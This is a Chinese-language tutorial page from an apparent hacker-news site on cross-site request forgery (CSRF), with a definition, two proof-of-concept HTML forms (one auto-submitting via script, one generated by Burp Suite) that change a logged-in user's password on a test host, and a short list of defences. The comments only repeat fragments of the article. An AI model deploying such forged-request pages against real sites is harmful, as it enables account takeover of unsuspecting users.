CSRF漏洞和利用

CSRF漏洞和利用

黑客资讯访客1970-01-01 8:00:002925A+A-

CSRF定义: 跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF , 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。

简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。

1、例子 修改密码

http://www.webtester.com/csrf/csrf01.php?c=main



登录过的网站 访问csrf.html就会触payload 从而修改密码。

1559793435130321.jpg

<html> 
<body>
<form name="csrf" action="http://www.webtester.com/csrf/csrf01.php?c=update" method="POST">
<input type=text name=password value="123456"></input>
<input type="submit" value="submit" />
</form>
<script>
 document.csrf.submit();
</script>
</body>
</html>

1.png
访问 http://www.demo.com/post-csrf.html  就会修改密码

2、测试方法


用burpsuite生成csrf payload

1559793530313873.png

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.webtester.com/csrf/csrf01.php?c=update" method="POST">
      <input type="hidden" name="password" value="a123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>




3防御方法


    加上token 进行认证
    判断页面来源
    页面加验证码判断

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 5条评论
  • 囤梦唔猫2022-05-28 13:23:26
  • 的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的
  • 笙沉桔烟2022-05-28 17:29:21
  • 法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的
  • 野欢岁吢2022-05-28 15:05:52
  • 操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份验证的一个漏洞:简单的身份验证
  • 痛言唔猫2022-05-28 09:58:42
  • 用程序上执行非本意的操作的攻击方法。简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的
  • 鸢旧长野2022-05-28 12:43:33
  • 己曾经认证过的网站并执行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了we

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理